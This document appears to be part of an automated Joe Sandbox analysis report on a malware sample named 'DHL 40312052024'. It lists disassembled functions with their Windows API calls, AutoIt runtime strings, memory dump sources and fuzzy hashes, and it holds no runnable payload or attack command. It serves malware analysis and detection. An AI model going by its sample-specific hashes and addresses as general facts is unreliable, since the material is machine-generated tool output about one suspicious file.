                                                                                    • _wcscat.LIBCMT ref: 00814598
                                                                                    • _wcsncpy.LIBCMT ref: 008145C3
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                    • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                    • API String ID: 699586101-1459072770
                                                                                    • Opcode ID: 0ccfeb747358274511c8cab7d9a451fd60fd03770dca75d305a3dec2199dc064
                                                                                    • Instruction ID: dd4343811184dd1165dee9ceed9d4e769f28d2edee20ffe3c5877e9dfec35f34
                                                                                    • Opcode Fuzzy Hash: 0ccfeb747358274511c8cab7d9a451fd60fd03770dca75d305a3dec2199dc064
                                                                                    • Instruction Fuzzy Hash: E241E571A00204BBEB10AA74DC0BEFF777CEF51710F10056BF905E6283EA799A4296E5
                                                                                    Function 007B27D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007B28BC
                                                                                    • GetSystemMetrics.USER32(00000007), ref: 007B28C4
                                                                                    • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007B28EF
                                                                                    • GetSystemMetrics.USER32(00000008), ref: 007B28F7
                                                                                    • GetSystemMetrics.USER32(00000004), ref: 007B291C
                                                                                    • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 007B2939
                                                                                    • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 007B2949
                                                                                    • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 007B297C
                                                                                    • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 007B2990
                                                                                    • GetClientRect.USER32(00000000,000000FF), ref: 007B29AE
                                                                                    • GetStockObject.GDI32(00000011), ref: 007B29CA
                                                                                    • SendMessageW.USER32(00000000,00000030,00000000), ref: 007B29D5
                                                                                      • Part of subcall function 007B2344: GetCursorPos.USER32(?), ref: 007B2357
                                                                                      • Part of subcall function 007B2344: ScreenToClient.USER32(008757B0,?), ref: 007B2374
                                                                                      • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000001), ref: 007B2399
                                                                                      • Part of subcall function 007B2344: GetAsyncKeyState.USER32(00000002), ref: 007B23A7
                                                                                    • SetTimer.USER32(00000000,00000000,00000028,007B1256), ref: 007B29FC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                    • String ID: AutoIt v3 GUI
                                                                                    • API String ID: 1458621304-248962490
                                                                                    • Opcode ID: 9759b350ca5e27b3fb907ee69f767f99e4ff33f1b0c8acd4c568f4c7841017b0
                                                                                    • Instruction ID: 99863a024a1e27679c713953fe4a2ab5a9c1688e93ebff83921c835f1e54c4df
                                                                                    • Opcode Fuzzy Hash: 9759b350ca5e27b3fb907ee69f767f99e4ff33f1b0c8acd4c568f4c7841017b0
                                                                                    • Instruction Fuzzy Hash: B7B17E71A01209DFDB15DFA8CC49BEE7BB4FB48310F104129FA19E62A5DB78D841CB51
                                                                                    Function 0080A439 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0080A47A
                                                                                    • __swprintf.LIBCMT ref: 0080A51B
                                                                                    • _wcscmp.LIBCMT ref: 0080A52E
                                                                                    • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0080A583
                                                                                    • _wcscmp.LIBCMT ref: 0080A5BF
                                                                                    • GetClassNameW.USER32(?,?,00000400), ref: 0080A5F6
                                                                                    • GetDlgCtrlID.USER32(?), ref: 0080A648
                                                                                    • GetWindowRect.USER32(?,?), ref: 0080A67E
                                                                                    • GetParent.USER32(?), ref: 0080A69C
                                                                                    • ScreenToClient.USER32(00000000), ref: 0080A6A3
                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 0080A71D
                                                                                    • _wcscmp.LIBCMT ref: 0080A731
                                                                                    • GetWindowTextW.USER32(?,?,00000400), ref: 0080A757
                                                                                    • _wcscmp.LIBCMT ref: 0080A76B
                                                                                      • Part of subcall function 007D362C: _iswctype.LIBCMT ref: 007D3634
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                    • String ID: %s%u
                                                                                    • API String ID: 3744389584-679674701
                                                                                    • Opcode ID: 62b05047515951be6643a0db8633d51bdce598d5cda072b299f6e81982d9ff0d
                                                                                    • Instruction ID: f03228877f0cbb47edb116222d523c4cc263220b523ba5d4906058b36243f7d0
                                                                                    • Opcode Fuzzy Hash: 62b05047515951be6643a0db8633d51bdce598d5cda072b299f6e81982d9ff0d
                                                                                    • Instruction Fuzzy Hash: 4EA1DE71204706AFDB59DF60CC88FAAB7E8FF54314F008629F9A9D2190DB30E955CB92
                                                                                    Function 0080AED4 Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetClassNameW.USER32(00000008,?,00000400), ref: 0080AF18
                                                                                    • _wcscmp.LIBCMT ref: 0080AF29
                                                                                    • GetWindowTextW.USER32(00000001,?,00000400), ref: 0080AF51
                                                                                    • CharUpperBuffW.USER32(?,00000000), ref: 0080AF6E
                                                                                    • _wcscmp.LIBCMT ref: 0080AF8C
                                                                                    • _wcsstr.LIBCMT ref: 0080AF9D
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0080AFD5
                                                                                    • _wcscmp.LIBCMT ref: 0080AFE5
                                                                                    • GetWindowTextW.USER32(00000002,?,00000400), ref: 0080B00C
                                                                                    • GetClassNameW.USER32(00000018,?,00000400), ref: 0080B055
                                                                                    • _wcscmp.LIBCMT ref: 0080B065
                                                                                    • GetClassNameW.USER32(00000010,?,00000400), ref: 0080B08D
                                                                                    • GetWindowRect.USER32(00000004,?), ref: 0080B0F6
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                    • String ID: @$ThumbnailClass
                                                                                    • API String ID: 1788623398-1539354611
                                                                                    • Opcode ID: 76ee58f84f9ba2b163d69af6b2c1dd1865d1e36c08a126b07ff74d4e1b055ebc
                                                                                    • Instruction ID: b7d54e6031ec0ac31a5e84ea0cae7949cdd91cce35884d2d5bdd8524d37d94fc
                                                                                    • Opcode Fuzzy Hash: 76ee58f84f9ba2b163d69af6b2c1dd1865d1e36c08a126b07ff74d4e1b055ebc
                                                                                    • Instruction Fuzzy Hash: 41819C711083069BDB44DF14CC85BAA7BE8FF94314F04846AED85DA1D2DB34DD49CBA2
                                                                                    Function 0080ABD4 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: __wcsnicmp
                                                                                    • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                    • API String ID: 1038674560-1810252412
                                                                                    • Opcode ID: b4547288ff1101b4763709532fd115ce37812d1f67b78f52c4b4d7cbc31647d4
                                                                                    • Instruction ID: 1502d9911bee24eeec8c3cb7d1cdafe65c2fadd5dbb4365d71e07038934710b2
                                                                                    • Opcode Fuzzy Hash: b4547288ff1101b4763709532fd115ce37812d1f67b78f52c4b4d7cbc31647d4
                                                                                    • Instruction Fuzzy Hash: 15318F31948309EAEA18FAA0DD4BFEE7774FB10769F610429F411F12D1EE696F04C692
                                                                                    Function 00824FFD Relevance: 25.6, APIs: 17, Instructions: 110COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadCursorW.USER32(00000000,00007F8A), ref: 00825013
                                                                                    • LoadCursorW.USER32(00000000,00007F00), ref: 0082501E
                                                                                    • LoadCursorW.USER32(00000000,00007F03), ref: 00825029
                                                                                    • LoadCursorW.USER32(00000000,00007F8B), ref: 00825034
                                                                                    • LoadCursorW.USER32(00000000,00007F01), ref: 0082503F
                                                                                    • LoadCursorW.USER32(00000000,00007F81), ref: 0082504A
                                                                                    • LoadCursorW.USER32(00000000,00007F88), ref: 00825055
                                                                                    • LoadCursorW.USER32(00000000,00007F80), ref: 00825060
                                                                                    • LoadCursorW.USER32(00000000,00007F86), ref: 0082506B
                                                                                    • LoadCursorW.USER32(00000000,00007F83), ref: 00825076
                                                                                    • LoadCursorW.USER32(00000000,00007F85), ref: 00825081
                                                                                    • LoadCursorW.USER32(00000000,00007F82), ref: 0082508C
                                                                                    • LoadCursorW.USER32(00000000,00007F84), ref: 00825097
                                                                                    • LoadCursorW.USER32(00000000,00007F04), ref: 008250A2
                                                                                    • LoadCursorW.USER32(00000000,00007F02), ref: 008250AD
                                                                                    • LoadCursorW.USER32(00000000,00007F89), ref: 008250B8
                                                                                    • GetCursorInfo.USER32(?), ref: 008250C8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Cursor$Load$Info
                                                                                    • String ID:
                                                                                    • API String ID: 2577412497-0
                                                                                    • Opcode ID: 1f584e69b915cbd8db0b6d6e597c4dc23c3260a4f736d4659f15e624f8130f3e
                                                                                    • Instruction ID: 13e6854991b5800939398185de6c09871ef68b914af1b9631ea5843fbdb37bed
                                                                                    • Opcode Fuzzy Hash: 1f584e69b915cbd8db0b6d6e597c4dc23c3260a4f736d4659f15e624f8130f3e
                                                                                    • Instruction Fuzzy Hash: B63114B1D4831D6ADF109FB69C8999EBFE8FF04750F50453AA50CE7280DA7865408F91
                                                                                    Function 0083A1B9 Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _memset.LIBCMT ref: 0083A259
                                                                                    • DestroyWindow.USER32(?,?), ref: 0083A2D3
                                                                                      • Part of subcall function 007B7BCC: _memmove.LIBCMT ref: 007B7C06
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0083A34D
                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0083A36F
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0083A382
                                                                                    • DestroyWindow.USER32(00000000), ref: 0083A3A4
                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007B0000,00000000), ref: 0083A3DB
                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0083A3F4
                                                                                    • GetDesktopWindow.USER32 ref: 0083A40D
                                                                                    • GetWindowRect.USER32(00000000), ref: 0083A414
                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0083A42C
                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0083A444
                                                                                      • Part of subcall function 007B25DB: GetWindowLongW.USER32(?,000000EB), ref: 007B25EC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                    • String ID: 0$tooltips_class32
                                                                                    • API String ID: 1297703922-3619404913
                                                                                    • Opcode ID: 8764f3c94f30714e438902c461e76a4ff1872f18c9e981e498dd1b65d6a83554
                                                                                    • Instruction ID: 8550168ed48f142d8627de89df449d7ce7f01ddf3e08ed57c281040886beb5bf
                                                                                    • Opcode Fuzzy Hash: 8764f3c94f30714e438902c461e76a4ff1872f18c9e981e498dd1b65d6a83554
                                                                                    • Instruction Fuzzy Hash: F3717870540205AFDB29CF28CC49FAA7BE5FB88704F04492DF985C72A1D7B5E942CB96
                                                                                    Function 0083C5FE Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 007B2612: GetWindowLongW.USER32(?,000000EB), ref: 007B2623
                                                                                    • DragQueryPoint.SHELL32(?,?), ref: 0083C627
                                                                                      • Part of subcall function 0083AB37: ClientToScreen.USER32(?,?), ref: 0083AB60
                                                                                      • Part of subcall function 0083AB37: GetWindowRect.USER32(?,?), ref: 0083ABD6
                                                                                      • Part of subcall function 0083AB37: PtInRect.USER32(?,?,0083C014), ref: 0083ABE6
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0083C690
                                                                                    • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0083C69B
                                                                                    • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0083C6BE
                                                                                    • _wcscat.LIBCMT ref: 0083C6EE
                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0083C705
                                                                                    • SendMessageW.USER32(?,000000B0,?,?), ref: 0083C71E
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0083C735
                                                                                    • SendMessageW.USER32(?,000000B1,?,?), ref: 0083C757
                                                                                    • DragFinish.SHELL32(?), ref: 0083C75E
                                                                                    • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0083C851
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                    • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                    • API String ID: 169749273-3440237614
                                                                                    • Opcode ID: 8579a6cbd820e1902c27dd170cb1654d49951468f61f66b8067edbf5b798a0d6
                                                                                    • Instruction ID: 468077b67fbd8b2b6810814ecc283c3ecb1f5243e154aba313a05368fa441d52
                                                                                    • Opcode Fuzzy Hash: 8579a6cbd820e1902c27dd170cb1654d49951468f61f66b8067edbf5b798a0d6
                                                                                    • Instruction Fuzzy Hash: 51614E71508300AFC705EF64DC89E9BBBE8FFD9750F00092DF695922A1DB749949CB92
                                                                                    Function 00834392 Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • CharUpperBuffW.USER32(?,?), ref: 00834424
                                                                                    • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0083446F
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: BuffCharMessageSendUpper
                                                                                    • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                    • API String ID: 3974292440-4258414348
                                                                                    • Opcode ID: 5a60f79e2bec0211444339893185422c4d0c9a6b2784edf88babdae3ca651ca1
                                                                                    • Instruction ID: 26ec33fc4f184d741f6d8cb4b8bb5fc2dd0c5ed9b0fb40b753647d15ff34037a
                                                                                    • Opcode Fuzzy Hash: 5a60f79e2bec0211444339893185422c4d0c9a6b2784edf88babdae3ca651ca1
                                                                                    • Instruction Fuzzy Hash: 5A917B702047019FCB04EF14C856BAEB7A1FF95354F059868F9A69B3A2DB34ED09CB81
                                                                                    Function 0083B7FE Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 197windowlibraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0083B8B4
                                                                                    • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,008391C2), ref: 0083B910
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0083B949
                                                                                    • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0083B98C
                                                                                    • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0083B9C3
                                                                                    • FreeLibrary.KERNEL32(?), ref: 0083B9CF
                                                                                    • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0083B9DF
                                                                                    • DestroyIcon.USER32(?,?,?,?,?,008391C2), ref: 0083B9EE
                                                                                    • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0083BA0B
                                                                                    • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0083BA17
                                                                                      • Part of subcall function 007D2EFD: __wcsicmp_l.LIBCMT ref: 007D2F86
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                                                    • String ID: .dll$.exe$.icl
                                                                                    • API String ID: 1212759294-1154884017
                                                                                    • Opcode ID: a12f8b24fa9bb52c70580fa8b0f5347daadbfc341a94d0be0d71b4de77b83850
                                                                                    • Instruction ID: 1545852ab8d3261524be0d5a8e202a57f631d433737856b905e83ac30b58853f
                                                                                    • Opcode Fuzzy Hash: a12f8b24fa9bb52c70580fa8b0f5347daadbfc341a94d0be0d71b4de77b83850
                                                                                    • Instruction Fuzzy Hash: EB61EDB1900219FAEB14DF64CC45FBA7BA8FB48720F104516FE15D61C2EB789991DBE0
                                                                                    Function 0081DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetLocalTime.KERNEL32(?), ref: 0081DCDC
                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 0081DCEC
                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0081DCF8
                                                                                    • __wsplitpath.LIBCMT ref: 0081DD56
                                                                                    • _wcscat.LIBCMT ref: 0081DD6E
                                                                                    • _wcscat.LIBCMT ref: 0081DD80
                                                                                    • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0081DD95
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DDA9
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DDDB
                                                                                    • SetCurrentDirectoryW.KERNEL32(?), ref: 0081DDFC
                                                                                    • _wcscpy.LIBCMT ref: 0081DE08
                                                                                    • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0081DE47
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                    • String ID: *.*
                                                                                    • API String ID: 3566783562-438819550
                                                                                    • Opcode ID: 21e393b64be7a503a49f414f02eb521493510f7ebc19521e60b6420fb75aa272
                                                                                    • Instruction ID: 10ba4be496a0ea2b71fcfaf6ac5d197ec6d9bede119e000a1cced1205ef1ec6b
                                                                                    • Opcode Fuzzy Hash: 21e393b64be7a503a49f414f02eb521493510f7ebc19521e60b6420fb75aa272
                                                                                    • Instruction Fuzzy Hash: 046139725043459FCB10EF64C844AEAB3E8FF89314F04492AFA99C7251DB35E985CB92
                                                                                    Function 00819C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00819C7F
                                                                                      • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
                                                                                    • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00819CA0
                                                                                    • __swprintf.LIBCMT ref: 00819CF9
                                                                                    • __swprintf.LIBCMT ref: 00819D12
                                                                                    • _wprintf.LIBCMT ref: 00819DB9
                                                                                    • _wprintf.LIBCMT ref: 00819DD7
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
